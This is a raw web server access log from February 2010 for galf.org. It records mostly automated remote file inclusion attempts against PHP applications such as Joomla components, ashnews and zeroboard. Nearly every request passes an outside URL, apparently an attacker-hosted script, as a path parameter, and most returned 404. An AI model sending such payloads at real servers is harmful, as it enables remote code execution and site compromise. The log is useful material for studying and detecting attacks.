83.103.72.130 - - [15/Feb/2010:01:46:56 -0800] "GET /logs/access_100104.log%20%20///write_comment_update.php?board_skin_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:49:11 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [15/Feb/2010:01:51:23 -0800] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [15/Feb/2010:01:51:41 -0800] "GET //inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [15/Feb/2010:01:51:41 -0800] "GET /logs/access_090720.log///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [15/Feb/2010:01:51:41 -0800] "GET /logs///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [15/Feb/2010:01:51:49 -0800] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:01:53:26 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:01:53:26 -0800] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:54:03 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:54:03 -0800] "GET /logs//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:54:03 -0800] "GET /write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:54:04 -0800] "GET /write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:54:04 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:54:04 -0800] "GET /logs//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:54:38 -0800] "GET /logs/access_091207.log//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:54:39 -0800] "GET /logs/access_090720.log//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:54:50 -0800] "GET /logs/access_091019.log//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:55:00 -0800] "GET /zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:55:00 -0800] "GET /logs/access_091123.log//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:55:00 -0800] "GET /logs//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:55:07 -0800] "GET /logs/access_091123.log//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:55:07 -0800] "GET /zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:55:07 -0800] "GET /logs//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:01:55:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
74.54.22.2 - - [15/Feb/2010:01:55:25 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
218.38.136.126 - - [15/Feb/2010:01:55:30 -0800] "GET /logs/access.log///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.162 - - [15/Feb/2010:01:55:55 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.38.136.126 - - [15/Feb/2010:01:55:59 -0800] "GET /logs/access_091228.log///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:56:31 -0800] "GET /logs/access_090831.log//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:56:41 -0800] "GET /logs/access_091123.log//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:56:41 -0800] "GET /zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:56:41 -0800] "GET /logs//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [15/Feb/2010:01:57:20 -0800] "GET /logs/access_091228.log//ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:57:36 -0800] "GET /logs/access_091116.log//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:58:08 -0800] "GET /logs/access_091116.log//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [15/Feb/2010:01:58:51 -0800] "GET /logs/access_090810.log HTTP/1.0" 200 4806214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:58:52 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:01:58:55 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:01:59:04 -0800] "GET /logs/access_090706.log/%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:01:59:04 -0800] "GET /logs/%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:01:59:04 -0800] "GET /%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:01:59:06 -0800] "GET /%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:01:59:06 -0800] "GET /logs/access_090706.log/%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:01:59:06 -0800] "GET /logs/%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:01:59:44 -0800] "GET /logs/access_091116.log//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:02:01:06 -0800] "GET /logs/%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:02:01:06 -0800] "GET /logs/access_090720.log/%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.146 - - [15/Feb/2010:02:01:06 -0800] "GET /%93/index.php?option=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:05 -0800] "GET /zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:05 -0800] "GET /logs/access_091123.log%20%20//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:05 -0800] "GET /logs//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:07 -0800] "GET /logs//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:07 -0800] "GET /logs/access_091123.log%20%20//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:07 -0800] "GET /zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:07 -0800] "GET /logs//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:07 -0800] "GET /logs/access_091123.log%20%20//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:03:07 -0800] "GET /zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:04:40 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [15/Feb/2010:02:04:41 -0800] "GET /logs/access_100125.log//write_update.php?board_skin_path=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [15/Feb/2010:02:04:49 -0800] "GET /logs/access_090720.log//include/bbs.lib.inc.php?site_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [15/Feb/2010:02:04:49 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [15/Feb/2010:02:04:49 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:20 -0800] "GET /index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:20 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:21 -0800] "GET /logs/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:29 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:29 -0800] "GET /logs/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:30 -0800] "GET /index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:30 -0800] "GET /logs/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:30 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:30 -0800] "GET /index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:41 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:41 -0800] "GET /index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:41 -0800] "GET /logs/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:48 -0800] "GET /logs/access_091221.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:48 -0800] "GET /index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:48 -0800] "GET /logs/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:49 -0800] "GET /logs/access.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:52 -0800] "GET /logs/access.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:53 -0800] "GET /logs/access.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:07:59 -0800] "GET /logs/access.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:08:03 -0800] "GET /logs/access.log%20%20/index0.php?show=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:08:29 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:08:29 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:08:29 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:08:43 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:08:43 -0800] "GET /atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:08:43 -0800] "GET /logs//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:08:43 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:08:44 -0800] "GET /logs/access_090720.log//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:08:44 -0800] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:15 -0800] "GET /atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:15 -0800] "GET /logs/access.log//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:15 -0800] "GET /logs//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:15 -0800] "GET /atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:15 -0800] "GET /logs//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:15 -0800] "GET /logs/access_091019.log//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:16 -0800] "GET /atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:16 -0800] "GET /logs/access_091019.log//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:16 -0800] "GET /logs/access_090831.log//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.205.120.218 - - [15/Feb/2010:02:09:16 -0800] "GET /logs//atom.php5?page=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:02:09:45 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
213.239.230.130 - - [15/Feb/2010:02:09:45 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.marketolog.info/cache/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:24 -0800] "GET /logs/access_091228.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:24 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:24 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:52 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:52 -0800] "GET /logs/access_091228.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:52 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:55 -0800] "GET /logs/access_091228.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:55 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.87.240.120 - - [15/Feb/2010:02:10:55 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:11:26 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.128.160 - - [15/Feb/2010:02:11:28 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:14:17 -0800] "GET /logs/access_091116.log%20%20//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:14:20 -0800] "GET /logs/access_091116.log%20%20//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [15/Feb/2010:02:14:23 -0800] "GET /logs/access_091116.log%20%20//zb41/bbs///include/print_category.php?setup[use_category]=1&dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:15 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.196.78 - - [15/Feb/2010:02:15:15 -0800] "GET /logs/homepage.php?sel=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
